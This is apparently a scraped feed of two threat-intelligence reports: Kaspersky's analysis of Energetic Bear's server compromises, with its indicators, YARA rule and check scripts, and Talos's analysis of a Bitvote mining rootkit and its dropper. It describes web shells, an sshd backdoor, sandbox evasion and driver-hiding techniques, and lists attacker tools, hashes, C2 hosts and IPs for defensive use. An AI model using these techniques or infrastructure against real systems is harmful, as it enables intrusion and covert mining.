non-profit organization, social network for college/university alumni, communication platform for NGOs, etc. \nBusiness \u2013 photographic studio \nIndustrial enterprise, construction company \nDoor manufacturing \nCryptocurrency exchange \nConstruction information and analysis portal \nPersonal website of a developer \nVainah Telecom IPs and Subnets (Chechen Republic) \nVarious Chechen resources (governmental organizations, universities, industrial enterprises, etc.) \nWeb server with numerous sites (alumni sites, sites of industrial and engineering companies, etc.) \nMuslim dating site \n**Brazil** | Water treatment \n**Turkey** | Hotels \nEmbassy in Turkey \nSoftware developer \nAirport website \nCity council website \nCosmetics manufacturer \nReligious website \nTurktelekom subnet with a large number of sites \nTelnet Telecom subnet with a large number of sites \n**Georgia** | Personal website of a journalist \n**Kazakhstan** | Unknown web server \n**Ukraine** | Office supplies online store \nFloral business \nImage hosting service \nOnline course on sales \nDealer of farming equipment and spare parts \nUkrainian civil servant's personal website \nOnline store of parts for household appliance repair \nTimber sales, construction \nTennis club website \nOnline store for farmers \nOnline store of massage equipment \nOnline clothes store \nWebsite development and promotion \nOnline air conditioner store \n**Switzerland** | Analytical company \n**US** | Web server with many domains \n**France** | Web server with many domains \n**Vietnam** | Unknown server \n**International** | Flight tracker \n \nThe sites and servers on this list do not seem to have anything in common. Even though the scanned servers do not necessarily look like potential final victims, it is likely that the attackers scanned different resources to find a server that could be used to establish a foothold for hosting the attackers' tools and, subsequently, to develop the attack.\n\nPart of the sites scanned may have been of interest to the attackers as candidates for hosting waterhole resources.\n\nIn some cases, the domains scanned were hosted on the same server; sometimes the attackers went through the list of possible domains matching a given IP.\n\nIn most cases, multiple attempts to compromise a specific target were not identified \u2013 with the possible exception of sites on the Bump platform, flight tracker servers and servers of a Turkish hotel chain.\n\nCuriously, the sites scanned included a web developer's website, kashey.ru, and resources links to which were found on this site. These may have been links to resources developed by the site's owner: [www.esodedi.ru](<http://www.esodedi.ru>), [www.i-stroy.ru](<http://www.i-stroy.ru>), [www.saledoor.ru](<http://www.saledoor.ru>)\n\n## Toolset used\n\n### Utilities\n\nUtilities found on compromised servers are open-source and publicly available on GitHub:\n\n * Nmap \u2013 an open-source utility for analyzing the network and verifying its security.\n * [Dirsearch](<https://github.com/maurosoria/dirsearch>) \u2014 a simple command-line tool for brute forcing (performing exhaustive searches of) directories and files on websites.\n * [Sqlmap](<https://github.com/sqlmapproject/sqlmap>) \u2014 an open-source penetration testing tool, which automates the process of identifying and exploiting SQL injection vulnerabilities and taking over database servers.\n * [Sublist3r](<https://github.com/aboul3la/Sublist3r>) \u2014 a tool written in Python designed to enumerate website subdomains. The tool uses open-source intelligence ([OSINT](<https://ru.wikipedia.org/wiki/OSINT>)). Sublist3r supports many different search engines, such as Google, Yahoo, Bing, Baidu and Ask, as well as such services as Netcraft, Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS. The tool helps penetration testers to collect information on the subdomains of the domain they are researching.\n * [Wpscan](<https://github.com/wpscanteam/wpscan>) \u2014 a WordPress vulnerability scanner that uses the blackbox principle, i.e., works without access to the source code. It can be used to scan remote WordPress sites in search of security issues.\n * [Impacket](<https://github.com/CoreSecurity/impacket>) \u2014 a toolset for working with various network protocols, which is required by SMBTrap.\n * [SMBTrap](<https://github.com/CylanceSPEAR/SMBTrap>) \u2014 a tool for logging data received over the SMB protocol (user IP address, user name, domain name, password NTLM hash).\n * [Commix](<https://github.com/commixproject/commix>) \u2014 a vulnerability search and command injection and exploitation tool written in Python.\n * [Subbrute](<https://github.com/TheRook/subbrute>) \u2013 a subdomain enumeration tool available for Python and Windows that uses an open name resolver as a proxy and does not send traffic to the target DNS server.\n * [PHPMailer](<https://github.com/PHPMailer/PHPMailer>) \u2013 a mail sending tool.\n\nIn addition, a custom Python script named ftpChecker.py was found on one of the servers. The script was designed to check FTP hosts from an incoming list.\n\n### Malicious php files\n\nThe following malicious php files were found in different directories in the nginx folder and in a working directory created by the attackers on an infected web servers:\n\n**File name** | **Brief description** | **md5sum** | **Time of the latest file change (MSK)** | **Size, bytes** \n---|---|---|---|--- \nini.php | wso shell+ mail | f3e3e25a822012023c6e81b206711865 | 2016-07-01 15:57:38 | 28786 \nmysql.php | wso shell+ mail | f3e3e25a822012023c6e81b206711865 | 2016-06-12 13:35:30 | 28786 \nopts.php | wso shell | c76470e85b7f3da46539b40e5c552712 | 2016-06-12 12:23:28 | 36623 \nerror_log.php | wso shell | 155385cc19e3092765bcfed034b82ccb | 2016-06-12 10:59:39 | 36636 \ncode29.php | web shell | 1644af9b6424e8f58f39c7fa5e76de51 | 2016-06-12 11:10:40 | 10724 \nproxy87.php | web shell | 1644af9b6424e8f58f39c7fa5e76de51 | 2016-06-12 14:31:13 | 10724 \ntheme.php | wso shell | 2292f5db385068e161ae277531b2e114 | 2017-05-16 17:33:02 | 133104 \nsma.php | PHPMailer | 7ec514bbdc6dd8f606f803d39af8883f | 2017-05-19 13:53:53 | 14696 \nmedia.php | wso shell | 78c31eff38fdb72ea3b1800ea917940f | 2017-04-17 15:58:41 | 1762986 \n \nIn the table above:\n\n * Web shell is a script that allows remote administration of the machine.\n * WSO is a popular web shell and file manager (it stands for \"Web Shell by Orb\") that has the ability to masquerade as an error page containing a hidden login form. It is available on GitHub:\n\n<https://github.com/wso-shell/WSO>\n\nTwo of the PHP scripts found, ini.php and mysql.php, contained a WSO shell concatenated with the following email spamming script:\n\n<https://github.com/bediger4000/php-malware-analysis/tree/master/db-config.php>\n\nAll the scripts found are obfuscated.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/18124233/180418-energetic-bear-crouching-yeti-2.png>)\n\n_wso shell \u2013 error_log.php_\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/18124232/180418-energetic-bear-crouching-yeti-3.png>)\n\n_Deobfuscated wso shell \u2013 error_log.php_\n\nOne of the web shells was found on the server under two different names (proxy87.php and code29.php). It uses the eval function to execute a command sent via HTTP cookies or a POST request:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/18124231/180418-energetic-bear-crouching-yeti-4.png>)\n\n_Web shell \u2013 proxy87.php_\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/18124231/180418-energetic-bear-crouching-yeti-5.png>)\n\n_Deobfuscated web shell \u2013 proxy87.php_\n\n### Modified sshd\n\nA modified sshd with a preinstalled backdoor was found in the process of analyzing the server.\n\nPatches with some versions of backdoors for sshd that are similar to the backdoor found are available on GitHub, for example:\n\n<https://github.com/jivoi/openssh-backdoor-kit>\n\nCompilation is possible on any OS with binary compatibility.\n\nAs a result of replacing the original sshd file with a modified one on the infected server, an attacker can use a 'master password' to get authorized on the remote server, while leaving minimal traces (compared to an ordinary user connecting via ssh).\n\nIn addition, the modified sshd logs all legitimate ssh connections (this does not apply to the connection that uses the 'master password'), including connection times, account names and passwords. The log is encrypted and is located at /var/tmp/.pipe.sock.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/18124232/180418-energetic-bear-crouching-yeti-6.png>)\n\n_Decrypted log at /var/tmp/.pipe.sock_\n\n## Activity of the attackers on compromised servers\n\nIn addition to using compromised servers to scan numerous resources, other attacker activity was also identified.\n\nAfter gaining access to the server, the attackers installed the tools they needed at different times. Specifically, the following commands for third-party installations were identified on one of the servers:\n\n * apt install traceroute\n * apt-get install nmap\n * apt-get install screen\n * git clone https://github.com/sqlmapproject/sqlmap.git\n\nAdditionally, the attackers installed any packages and tools for Python they needed.\n\nThe diagram below shows times of illegitimate logons to one of the compromised servers during one month. The attackers checked the smbtrap log file on working days. In most cases, they logged on to the server at roughly the same time of day, probably in the morning hours:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/18124231/180418-energetic-bear-crouching-yeti-7.png>)\n\n_Times of illegitimate connections with the server (GMT+3)_\n\nIn addition, in the process of performing the analysis, an active process was identified that exploited SQL injection and collected data from a database of one of the victims.\n\n## Conclusion\n\nThe findings of the analysis of compromised servers and the attackers' activity on these servers are as follows:\n\n 1. With rare exceptions, the group's members get by with publicly available tools. The use of publicly available utilities by the group to conduct its attacks renders the task of attack attribution without any additional group 'markers' very difficult.\n 2. Potentially, any vulnerable server on the internet is of interest to the attackers when they want to establish a foothold in order to develop further attacks against target facilities.\n 3. In most cases that we have observed, the group performed tasks related to searching for vulnerabilities, gaining persistence on various hosts, and stealing authentication data.\n 4. The diversity of victims may indicate the diversity of the attackers' interests.\n 5. It can be assumed with some degree of certainty that the group operates in the interests of or takes orders from customers that are external to it, performing initial data collection, the theft of authentication data and gaining persistence on resources that are suitable for the attack's further development.\n\n## Appendix I \u2013 Indicators of Compromise\n\n### Filenames and Paths\n\n#### Tools*\n\n/usr/lib/libng/ftpChecker.py \n/usr/bin/nmap/ \n/usr/lib/libng/dirsearch/ \n/usr/share/python2.7/dirsearch/ \n/usr/lib/libng/SMBTrap/ \n/usr/lib/libng/commix/ \n/usr/lib/libng/subbrute-master/ \n/usr/share/python2.7/sqlmap/ \n/usr/lib/libng/sqlmap-dev/ \n/usr/lib/libng/wpscan/ \n/usr/share/python2.7/wpscan/ \n/usr/share/python2.7/Sublist3r/\n\n*Note that these tools can also be used by other threat actors.\n\n#### PHP files:\n\n/usr/share/python2.7/sma.php \n/usr/share/python2.7/theme.php \n/root/theme.php \n/usr/lib/libng/media.php\n\n#### Logs\n\n/var/tmp/.pipe.sock\n\n### PHP file hashes\n\nf3e3e25a822012023c6e81b206711865 \nc76470e85b7f3da46539b40e5c552712 \n155385cc19e3092765bcfed034b82ccb \n1644af9b6424e8f58f39c7fa5e76de51 \n2292f5db385068e161ae277531b2e114 \n7ec514bbdc6dd8f606f803d39af8883f \n78c31eff38fdb72ea3b1800ea917940f\n\n### Yara rules\n\nrule Backdoored_ssh { \nstrings: \n$a1 = \"OpenSSH\" \n$a2 = \"usage: ssh\" \n$a3 = \"HISTFILE\" \ncondition: \nuint32(0) == 0x464c457f and filesize<1000000 and all of ($a*) \n}\n\n## Appendix II \u2013 Shell script to check a server for tools\n\n### Shell script for Debian\n\ncd /tmp \nworkdir=428c5fcf495396df04a459e317b70ca2 \nmkdir $workdir \ncd $workdir \nfind / -type d -iname smbtrap > find-smbtrap.txt 2>/dev/null \nfind / -type d -iname dirsearch > find-dirsearch.txt 2>/dev/null \nfind / -type d -iname nmap > find-nmap.txt 2>/dev/null \nfind / -type d -iname wpscan > find-wpscan.txt 2>/dev/null \nfind / -type d -iname sublist3r > find-sublist3r.txt 2>/dev/null \ndpkg -l | grep -E \\\\(impacket\\|pcapy\\|nmap\\\\) > dpkg-grep.txt \ncp /var/lib/dpkg/info/openssh-server.md5sums . #retrieve initial hash for sshd \nmd5sum /usr/sbin/sshd > sshd.md5sum #calculate actual hash for sshd\n\n### Shell script for Centos\n\ncd /tmp \nworkdir=428c5fcf495396df04a459e317b70ca2 \nmkdir $workdir \ncd $workdir \nfind / -type d -iname smbtrap > find-smbtrap.txt 2>/dev/null \nfind / -type d -iname dirsearch > find-dirsearch.txt 2>/dev/null \nfind / -type d -iname nmap > find-nmap.txt 2>/dev/null \nfind / -type d -iname wpscan > find-wpscan.txt 2>/dev/null \nfind / -type d -iname sublist3r > find-sublist3r.txt 2>/dev/null \nrpm -qa | grep -E \\\\(impacket\\|pcapy\\|nmap\\\\) > rpm-grep.txt \nrpm -qa -dump | grep ssh > rpm-qa-dump.txt #retrieve initial hash for sshd \nsha256sum /usr/sbin/sshd > sshd.sha256sum #calculate actual sha256 hash for sshd \nmd5sum /usr/sbin/sshd > sshd.md5sum #calculate actual md5 hash for sshd\n\n[ **Energetic Bear/Crouching Yeti: attacks on servers**](<https://ics-cert.kaspersky.com/media/EB_public_FINAL_EN_20042018.pdf>)", "reporter": "Kaspersky Lab ICS CERT", "published": "2018-04-23T10:00:36", "type": "securelist", "title": "Energetic Bear/Crouching Yeti: attacks on servers", "enchantments": {}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-04-23T10:00:36", "id": "SECURELIST:5120B9325810A974F19B2E365EC8516C", "href": "https://securelist.com/energetic-bear-crouching-yeti/85345/", "cvss": {"score": 0.0, "vector": "NONE"}}], "talosblog": [{"lastseen": "2018-04-24T14:41:40", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "### Executive summary\n\n \nSoon after a launch of a new cryptocurrency, Bitvote, in January, Talos discovered a new mining campaign affecting systems in India, Indonesia, Vietnam and several other countries that were tied to Bitvote. \n \nApart from the fact that the attackers have chosen to target the new bitcoin fork in order to gain the early adoption advantage, this campaign is notable for its usage of a kernel-mode driver to manage command and control (C2) infrastructure, configuration management, download and execute functionality, as well as payload protection. It is quite uncommon to implement this functionality in kernel, apart from the payload protection, and points to a moderate to high level of technical knowledge behind the attack. \n \nThe payloads and the configuration were embedded in specially modified animated GIF files and published as parts of web pages hosted on free blogging platforms. \n \nThe campaign was active in February and March, and so far, it has brought limited returns for attackers. \n \n \n \n\n\n### Introduction\n\n \nOne of the benefits of open-source projects is the ability for other people to create so-called \"forks\" \u2014 copies of the original source code repository and to essentially split (fork) the development process in two by creating a separate project with a new development team and a separate development process. \n \nForks also happen with cryptocurrencies. Since the initial release of bitcoin, there has been more than 18,000 forks of bitcoin code on the hosting service GitHub, although only a few of them have successfully been launched as alternatives to bitcoin. \n \nWhile some, such as Bitcoin Cash, Bitcoin Gold or Litecoin have been fairly successful, most new forks die out without being noticed by a significant number of users. \n \nA frequent reason that forks are created is to improve on the so-called \"one-CPU-one-vote\" principle, which prescribes rules on how the network decides on a transaction's validity. In the original plan laid out by [Bitcoin creator Satoshi Nakamoto](<https://www.google.com/url?q=https://bitcoin.org/bitcoin.pdf&sa=D&ust=1524498497022000>), the miner is awarded proportionally to the amount of computing resources they invested, without explicit mention of the type of hardware that should be used for mining. However, some people took the \"one-CPU-one-vote\" principle \u2014 quite literally \u2014 to mean that desktop CPUs should exclusively be used for mining. \n \nNevertheless, the original practice of bitcoin mining has moved away from using standard desktop system CPUs and GPUs, and into the realm of specialized ASIC-based hardware systems, requiring a significant up-front investment to achieve notable returns for miners. \n \nThis development has seen many home users moving away from mining bitcoin into mining other currencies such as Monero, which is specifically designed to make mining using ASIC more difficult. Monero also increasingly became the currency of choice for malicious mining botnets, which we already covered in [one of our recent blog posts](<https://www.google.com/url?q=https://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html&sa=D&ust=1524498497023000>). \n \nOn Jan. 20, an unknown group of developers launched a new bitcoin fork called [Bitvote](<https://www.google.com/url?q=https://bitvote.one/&sa=D&ust=1524498497024000>), with their own view on how to improve on the \"one-CPU-one-vote\" principle, and give desktop users a fairer chance to successfully mine a cryptocurrency. \n \nBitvote uses the [Cryptonight](<https://www.google.com/url?q=https://en.bitcoin.it/wiki/CryptoNight&sa=D&ust=1524498497024000>) algorithm for its proof of work, which is also used by Monero. The algorithm is designed to allow standard desktop CPUs to be equal participants in the mining process. \n \nAs cyber criminals move farther away from ransomware, and closer to cryptocurrency mining, it comes as no surprise to find out that a malicious actor decided to take a gamble on Bitvote, and developed a malicious campaign that resulted in the infection of hundreds of systems with a modified version of the cpuminer mining software, recruiting the affected systems into a Bitvote mining pool. \n \nThis post is focused on the driver functionality of Bitvote, although we briefly describe the dropper, as well as the final cryptocurrency mining payload used in this campaign. \n \n\n\n### Calculator with unexpected functionality: The dropper\n\n \nA driver dropper, purporting to be a calculator application was found by investigating [AMP for Endpoints](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/index.html&sa=D&ust=1524498497025000>) product telemetry. The dropper was spotted in the wild, and blocked on Feb. 6. It is likely to have been a part of a (potentially) unwanted application installer published on sites hosting an alleged version of Microsoft Toolkit, which should allow the user to activate different versions of Microsoft Office and Windows without owning a valid license. \n \nA Microsoft Toolkit bundler installs many potentially unwanted applications (PUAs), but it also installs a file calculator<nnnn>.exe that drops a randomly named kernel mode driver. Earlier calculator dropper variants have been around at least since the last quarter of 2017. \n \nTypically, the malicious functionality of the dropper (written using MFC framework) is to install the driver in the <Windows>\\system32\\drivers folder with eight random characters' base filename (eg. djkeuihk.sys), or with the original name of the driver, which is DrToolKrl.sys. After creating the driver, the dropper creates a Windows service with the same name, as the driver file loads the driver into the kernel memory by starting the service. \n \nBefore dropping the driver, the dropper checks if it is executing in a virtual machine environment, under a control of a debugger or in a sandbox. If a virtual machine environment is detected, the malicious driver is not dropped, and the execution continues with a calculator functionality. \n \n\n\n[](<https://2.bp.blogspot.com/--4fRvFciEpg/Wt31CTvxk5I/AAAAAAAAAHA/xD9k7Mw5EO4-LPHQCHAB96WzjI_bfN9GwCLcBGAs/s1600/image5.gif>)\n\nTrojanized Calculator GUI\n\n \nThe dropper checks for the following environments: \n \n\n\n * Parallels\n * VMWare\n * VirtualBox\n * JoeBox\n * GFI Sandbox (CWSandbox)\n * Anubis\n * Sandboxie\n * Debugging Tools for Windows\n \n \nIf a debugging or analysis environment is not detected, the dropper checks the version of the operating system in order to drop an appropriate, 32- or 64-bit version of the rootkit driver. It also attempts to communicate with the driver in order to make sure that the driver is not already loaded. \n \n\n\n[](<https://4.bp.blogspot.com/-GLkOgm74tzE/Wt31VngNS0I/AAAAAAAAAHI/m-WBmEQj3cgY6qzHn4TGwor2wwp1PwljgCLcBGAs/s1600/image3.png>)\n\nCheck for the bitness of the operating system and prepare to drop a driver\n\n \n\n\n### Main culprit: The driver\n\n \nThe driver is signed with a certificate belonging to \"Jiangsu innovation safety assessment Co., Ltd.\" with expired validity period. This means that it will not be loaded by Windows Vista and later versions of 64-bit Windows, which enforce valid driver signatures. On the one hand, this seems like a failure of the attacker's process, as the attack can only target older Windows versions, likely executing on less capable CPUs. On the other hand, it may prove to be an advantage for the attacker, as it is more likely that older systems are not fully up to date and protected with the latest security software. Therefore, this attack is less likely to be discovered if only older CPUs are affected. \n \nThe driver contains the functionality to: \n \n\n\n * Manage configuration of the C2 infrastructure\n * Parse configuration files hosted on free blogging platforms to decode the information hidden in animated GIF files published as part of the C2 blogs.\n * Download and execute the final payload (in our case, the Bitvote pool miner agent)\n * Protect the driver from deletion\n * Protect the driver registry entry from third-party access (read and write)\n * Protect payload processes and threads from termination\n * Download and install new driver versions \n * Disable the User Account Control (UAC)\n \n \nApart from the core driver's ability to protect itself and its payload, the driver somewhat unusually contains the download and execute functionalities, which is rarely implemented in kernel mode by well-known malware downloader families. \n \nThis indicates an increased level of proficiency of the author of the driver, who might also be the actor behind this Bitvote mining operation. \n \nHowever, it is also possible that the driver is created by a generic third party toolkit, which would allow an actor to specify configuration and payload URLs in a simple way. Once the configuration is specified, the toolkit might be used to build and sign the driver, which could also explain the fact that the driver samples were signed with an expired certificate. However, we were not able to find generator samples that would confirm this theory. \n \n\n\n#### Configuration management\n\n \nThe driver initially contained several hardcoded URLs pointing to free blogging platforms, such as Blogspot (Blogger) and Russian blogging platform LiveJournal. Before the hardcoded URLs are accessed, the dropper attempts to download a GIF file from a special URL hardcoded in the dropper body. \n \nThe downloaded GIF file contains an encrypted data blob at offset 0xA0000, with a driver configuration block including the new command and control locations, as well as updated URLs for downloads of payloads. The configuration data block starts with a header containing a magic double word 'lKTD' ('DTKl'), followed by a double word containing a simple addition-based checksum of all bytes in decoded configuration, a static double word XOR decryption key and a double word count of configuration records within the block. \n \n\n\n[](<https://4.bp.blogspot.com/-s5HqSofLj0U/Wt31oGUyk9I/AAAAAAAAAHQ/FU7Fat-AXNk8WEAgYHzBT2GA5d9H16dtgCLcBGAs/s1600/image13.png>)\n\nDownload and decode driver configuration\n\n \nEach configuration record size is 407 bytes long, and contains a type of the record, which may indicate a payload record, a driver update record or C2 record, followed by a URL, as well as pointers to HTML parsing functions, the local file paths and arguments that should be used when they are launched. \n \nThe configuration is decoded and loaded into the DeviceExtension block of the device object created by the driver in the DriverEntry function. The device extension block is the most important data structure associated with a device object. Its internal structure is driver-defined, and it is typically used to maintain device state information and provide storage for any kernel-defined objects. In our case, the DeviceExtension also stores the in-memory configuration of the malicious driver. \n \n\n\n[](<https://1.bp.blogspot.com/-DBuptSJpLFc/Wt4KCmWsjSI/AAAAAAAAAI8/eWU0sC4sKEINXLsLgFSSHYxSUsMkeHbAwCLcBGAs/s1600/image15a.png>)\n\nThe GIF containing the driver configuration\n\n \nThe IP address of any host is resolved by querying Google's DNS resolver 8.8.8.8. Defenders are advised to block direct traffic from standard internal network endpoints to external DNS resolvers, which would prevent the driver from downloading and executing payloads, as well as connecting to the botnet C2 servers, internally referred to as the \"Heart servers.\" \n \nThe host used as the Heart server in this campaign was cdn[.]rmb666[.]me. At the time of the analysis, the domain name resolved to 185.180.14.16, which is also associated with other malicious domains. The domain was registered on Dec. 20, 2017, and it seems to have been used specifically for this campaign. The IP address is hosted in the Czech Republic. The domain has now changed the provider,and it points to 91.213.8.57, an IP address hosted in Ukraine. \n \nThe country graph taken from the Cisco Umbrella Investigate tool indicates that the campaign was the most active in Indonesia with many other countries, such as India, Algeria and Vietnam being affected. \n \n\n\n[](<https://2.bp.blogspot.com/-4KYWSG13N8c/Wt31_m4YQ4I/AAAAAAAAAHc/LE6DZSSUx70Q4Fhm8Zo-Kept7kbEYxvkACLcBGAs/s1600/image4.png>)\n\nThe top affected countries are Indonesia and India\n\n \nThe driver uses fairly specific User-Agent string 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/520.16 (KHTML, like Gecko) Chrome/61 Safari/517' when posting the initial data to the C2 server, which may be a good network detection indicator. \n \n\n\n[](<https://4.bp.blogspot.com/-phwqkya8Bbo/Wt32WBZlnvI/AAAAAAAAAHo/rgUGRlL9jScY1nOzaX-UFhRWV23Y5yE_wCLcBGAs/s1600/image7.png>)\n\nInitial Heart server post request example\n\n \n\n\n#### Download and execute functionality\n\n \nOnce the configuration is uploaded, the driver loops over the records and attempts to access the specified URLs. If a URL hosts an HTML file, the driver will parse the page to find an image URL which satisfies a criteria set in the associated HTML parsing function. \n \nIf a target image URL is found, the driver will download the image file. The downloaded image files were GIF images with a PE executable payload simply appended to it. The driver then extracts the payload from the image, saves the payload into a destination path set by the configuration record and executes it by changing the process context into Windows Explorer (explorer.exe) and launching the downloaded file using the standard WinExec Windows API function. \n \nThe driver finds Windows Explorer process identifier (PID) by calling the ZwQuerySystemInformation API to obtain an array of SYSTEM_PROCESS_INFORMATION structures, one for each process in the system. \n \n\n\n[](<https://4.bp.blogspot.com/-IeDkSHJ4uNw/Wt32hMDnBhI/AAAAAAAAAHs/FNinPYtYwVYoGf1QBnOpkHiBoWGQ4fVoACLcBGAs/s1600/image10.png>)\n\nExecute the payload in the context of \"explorer.exe\"\n\n \n\n\n#### Driver protection \n\n \nApart from the core 'download and execute' functionality, the driver implements several protection techniques to protect the driver's file, its own in-memory configuration, its service and the payload process. \n \nTo protect itself, the driver stores its own image and the configuration records within a registry key, and if the original driver is removed from the disk or modified, the modified file is replaced by the original driver, or a new driver copy is created. \n \nIf the driver is not able to restore itself into the old location, it generates a new eight-character long base random name, saves the original version of the driver into the newly generated path and creates a new service to point to it. \n \nThe configuration is stored in the DataInfo value of the registry key used by the driver service. For example: \\HKLM\\System\\CurrentControlSet\\Services\\kemamiti\\DataInfo. The service registry key is protected by the driver, and the access to it is not allowed as long as the driver is active in memory. \n \n\n\n[](<https://4.bp.blogspot.com/-THCL4Uh8zG0/Wt32rhlWmmI/AAAAAAAAAH0/HIgCGOUAm-QyVGHnnPubzzPskQWQ2N2wwCLcBGAs/s1600/image14.png>)\n\nAccess to the driver services registry key is denied by the driver\n\n \n\n\n#### Hiding the driver\n\n \nThe driver attempts to hide by removing itself from the InLoadOrderLinks linked list of loaded modules. The driver accesses its own _DRIVER_OBJECT object DriverSection pointer, which points to an area with a _LDR_DATA_TABLE_ENTRY structure, used to keep the information about the loaded module. \n \nThe driver is removed from the InLoadOrder linked list by modifying both the Flink (forward link) member of the previous list member and Blink (backward link) of the next list member. \n \nThe driver also zeroes out the DriverName field of the _DRIVER_OBJECT object as well as FullDllName field in the _LDR_DATA_TABLE_ENTRY structure. \n \n\n\n[](<https://4.bp.blogspot.com/-mGG1_wyg9LQ/Wt325r36FsI/AAAAAAAAAH8/HKovhJiPeWIuKyYlGRz1U7hJp1HycxB6ACLcBGAs/s1600/image8.png>)\n\nThe driver zeroes out its name but BaseDllName still remains\n\n \nThis way, the name of the driver module is not displayed when the loaded module lists are examined by many utilities. For example, if we use the WinDbg extension [SwishDbgExt](<https://www.google.com/url?q=https://github.com/comaeio/SwishDbgExt&sa=D&ust=1524498497038000>), developed by Matthieu Suiche, to display kernel callbacks, the driver module name will not be displayed, although we can still follow hyperlinks to disassemble and analyze the callback code. \n \n\n\n[](<https://1.bp.blogspot.com/-X9yuDLB8b_w/Wt33JVgFWAI/AAAAAAAAAII/U4quHx4fs7QLwqnhwymMqOqPA-MkBldmgCLcBGAs/s1600/image6.png>)\n\nThe driver module name is not assigned to callbacks after zeroing out\n\n \n\n\n#### Payload process protection\n\n \nApart from protection of the module and its registry entries, the driver protects the payload process from termination and respawns the process if all of its threads are terminated. This is achieved using one of the documented kernel mechanisms and registering object callbacks, allowing the user to supply functions, which will be called by the kernel when the registered kernel event, such as opening a process, is triggered. \n \nThe protection of the process is implemented by calling the [ObRegisterCallbacks](<https://www.google.com/url?q=https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/wdm/nf-wdm-obregistercallbacks&sa=D&ust=1524498497039000>) for process objects. When the kernel initiates a callback, the rootkit changes the DesiredAccess mask in order to prevent other processes from terminating the payload. \n \nThere is some additional filtering, and if the process creating a handle to the payload is not explorer.exe or csrss.exe, the process will be unable to terminate the payload. \n \n\n\n[](<https://1.bp.blogspot.com/-gutR6iECe1Q/Wt33TNJ-9LI/AAAAAAAAAIM/qyQJcmyM14QFlH-DfDIMB-LHGUYM3v10ACLcBGAs/s1600/image12.png>)\n\nAccess to the payload process is denied by the driver\n\n \n\n\n#### System callbacks\n\n \nWhen Windows kernel mode rootkits appeared, they used to hook undocumented operating system structures and tables such as System Service Dispatch table (SSDT) or Interrupt Descriptor table (IDT) but today, they typically use documented interfaces, such as system callbacks, in order to avoid detection by Windows kernel security mechanisms. \n \nOur driver sample is also aware of Windows protection mechanisms, and it uses documented callbacks in order to register functions for its own protection. \n \nThe list of used functions for registering callbacks is: \n \n\n\n * [CmRegisterCallback](<https://www.google.com/url?q=https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/wdm/nf-wdm-cmregistercallback&sa=D&ust=1524498497042000>) \\- Registry callback for protection of registry values\n * [PsSetCreateProcessNotifyRoutine](<https://www.google.com/url?q=https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/ntddk/nf-ntddk-pssetcreateprocessnotifyroutine&sa=D&ust=1524498497043000>) \\- respawning the payload if the payload process is terminated\n * [PsSetLoadImageNotifyRoutine](<https://www.google.com/url?q=https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/ntddk/nf-ntddk-pssetloadimagenotifyroutine&sa=D&ust=1524498497043000>) \\- to disable User Account Control\n * [PsSetCreateThreadNotifyRoutine](<https://www.google.com/url?q=https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/ntddk/nf-ntddk-pssetcreatethreadnotifyroutine&sa=D&ust=1524498497044000>) \\- registry and driver file protection\n * ObRegisterCallbacks - to protect the payload from termination\n\n### Final payload - the miner\n\n \nThe final payload is a modified cpuminer application downloaded into <Windows>\\winserv,exe. The miner is modified to automatically connect to a btv.vvpool.com site using TCP port 5700 and join a Bitvote mining pool. The application seems to be a minor modification of an open-source cryptocurrency miner cpuminer, and it does not warrant further investigation. \n \n\n\n[](<https://2.bp.blogspot.com/-Lnq0aPsbsBo/Wt33cTd7WhI/AAAAAAAAAIU/2h_-VX3KO00EPlyS0VveEghgX1RMejdYACLcBGAs/s1600/image9.png>)\n\nThe miner connects to the pool at TCP port 5700 and sends its address\n\n \nAt the time of writing, we could see that the mining operation has been able to earn just over 4,400 BTV, close to $1,500. This is easily checked using [Bitvote block explorer](<https://www.google.com/url?q=https://block.bitvote.one/&sa=D&ust=1524498497045000>) ,and searching for transactions to the address 1C9BLDgbx8geYzc5sNPDUhpHWFqAEqHRHB, belonging to the botnet. \n \n\n\n[](<https://2.bp.blogspot.com/--YVCKUF4GqA/Wt33o0OjZhI/AAAAAAAAAIc/hCYm9OUCfDcjX5LpzfArSdhM3lhnsmodgCLcBGAs/s1600/image1.png>)\n\nDespite the moderate botnet size, the attackers earned more than $1,500.\n\n \nThe top hash rate of 340 Khash/s indicates around 2,500 bots participating in the mining activity, considering an average hash rate of 125 hashes per second that can be, on average, generated by an average CPU. It seems like attackers were betting on BTV, but the payback would be much higher if they attempted to mine another, more established cryptocurrency such as Monero. \n \n\n\n[](<https://4.bp.blogspot.com/-TytQ7yVHSrY/Wt33wmHUEdI/AAAAAAAAAIg/1TBhxpQokIg7yZYwLWCZwk4OmfrnXvC8QCLcBGAs/s1600/image2.png>)\n\nAfter a high initial hashrate the activity quickly dropped to 12Khash/s\n\n \nThe mining activity started its operation on Feb. 16, which can be seen in the [stats available](<https://www.google.com/url?q=http://www.vvpool.com/bitvote/1C9BLDgbx8geYzc5sNPDUhpHWFqAEqHRHB&sa=D&ust=1524498497047000>) on the vvpool.com website. \n \n\n\n### Conclusion\n\n \nWith the the difficulties and unpredictability associated with the recent widespread ransomware attacks, it is not surprising that cyber criminals are turning toward mining cryptocurrencies. Besides well-established cryptocurrencies such as Monero, malicious actors are also becoming early adopters of newly created cryptocurrencies. Bitvote is just one of these, created as a bitcoin fork and launched on Jan. 20. The attackers created trojanized calculator applications with an intention to create a large pool of infected machines to mine Bitvote. \n \nApart from targeting a newly created cryptocurrency, this campaign is notable for using a kernel 